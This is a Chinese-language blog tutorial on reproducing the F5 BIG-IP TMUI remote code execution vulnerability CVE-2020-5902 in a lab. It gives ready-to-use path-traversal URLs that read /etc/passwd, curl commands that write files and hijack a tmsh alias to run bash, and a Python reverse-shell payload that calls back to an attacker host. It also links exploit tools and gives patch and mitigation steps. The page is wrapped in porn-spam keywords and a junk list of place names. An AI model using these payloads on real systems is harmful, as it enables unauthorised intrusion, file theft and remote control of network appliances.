亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

發布時間:2021-12-28 18:00:30 來源:億速云 閱讀:157 作者:柒染 欄目:安全技術

這篇文章給大家介紹怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

0x00簡介

F5 BIG-IP 是美國``F5公司一款集成流量管理、DNS、出入站規則、web應用防火墻、web網關、負載均衡等功能的應用交付平臺。 在F5 BIG-IP產品的流量管理用戶頁面 (TMUI)/配置程序的特定頁面中存在一處遠程代碼執行漏洞,導致可以未授權訪問TMUI模塊所有功能(包括未公開功能),漏洞影響范圍包括執行任意系統命令、任意文件讀取、任意文件寫入、開啟/禁用服務等。

0x02漏洞概述

攻擊者可利用該漏洞執行任意系統命令、創建或刪除文件、禁用服務、執行任意的Java代碼,可獲取shell完全控制目標系統。

0x03影響范圍

F5 BIG‐IP 15.1.0

F5 BIG‐IP 15.0.0

F5 BIG‐IP 14.1.0‐14.1.2

F5 BIG‐IP 13.1.0‐13.1.3

F5 BIG‐IP 12.1.0‐12.1.5

F5 BIG‐IP 11.6.1‐11.6.5

0x04環境搭建

1.在F5官網注冊登錄下載試用即可。

https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.1.0&container=Virtual-Edition

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

2.然后隨便選擇一個下載地區,下載即可

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

3.下載完成后,使用VMware導入安裝

VMware左上角‘文件’->‘打開‘選擇下載好的文件

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

4.配置方面看自己的選擇導入后啟動即可系統默認賬戶:root/default登陸后需要修改默認密碼

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

5.輸入config,配置配置ip地址,點兩次回車鍵即可

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

6.設置完IP后訪問一下鏈接出現登錄頁面安裝成功 //注要https加IP

https://172.16.1.186/tmui/login.jsp

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

0x05漏洞復現

1.登錄管理頁面既是漏洞存在的地方,我們使用poc進行測試文件讀取:

https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

2.寫入文件

curl -k -H "Content-Type: application/x-www-form-urlencoded" -X POST -d "fileName=/tmp/success&content=東塔網絡安全學院" "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

3.讀取文件

curl -k "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/success"

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

4. 修改alias劫持list命令為bash

curl -k "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

4.1 寫入文件:bash文件

https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=id

4.2 執行bash文件

https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/test

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

注:因為權限不足無法完成此步操作,在實際環境中可以嘗試

5.反彈shell,寫入python反彈shell

https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/shell&content=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('172.16.1.132',7856));<br>os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

使用kali做監聽

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

執行以下命令反彈shell //沒有權限這里沒有反彈成功,可在實際環境中測試

怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現

6.利用工具

https://github.com/theLSA/f5-bigip-rce-cve-2020-5902

https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902

0x06修復建議

1、官方建議可以通過以下步驟暫時緩解影響(臨時修復方案)

1.1使用以下命令登錄對應系統:tmsh

1.2編輯 httpd 組件的配置文件;

edit /sys httpd all-properties

1.3文件內容如下 include ' <LocationMatch "...;."> Redirect 404 / </LocationMatch> '

1.4按照如下操作保存文件;

按下 ESC 并依次輸入:wq

1.5執行命令刷新配置文件;

save /sys config

1.6重啟 httpd 服務。

restart sys service httpd 并禁止外部IP對 TMUI 頁面的訪問。

2、升級到以下版本

BIG-IP 15.x: 15.1.0.4

BIG-IP 14.x: 14.1.2.6

BIG-IP 13.x: 13.1.3.4

BIG-IP 12.x: 12.1.5.2

BIG-IP 11.x: 11.6.5.2

關于怎么實現F5 BIG-IP遠程代碼執行漏洞CVE-2020-5902的復現就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

仙游县| 淮南市| 牡丹江市| 徐闻县| 平遥县| 太原市| 阿尔山市| 永靖县| 福泉市| 密山市| 资阳市| 车险| 临沂市| 精河县| 吉木乃县| 沈阳市| 平武县| 定边县| 麻阳| 尖扎县| 油尖旺区| 东光县| 扎兰屯市| 交口县| 香河县| 工布江达县| 大厂| 略阳县| 衡阳县| 岳阳县| 泰州市| 绥滨县| 丰宁| 吉安市| 汉阴县| 黄梅县| 博湖县| 通江县| 北川| 阿鲁科尔沁旗| 南皮县|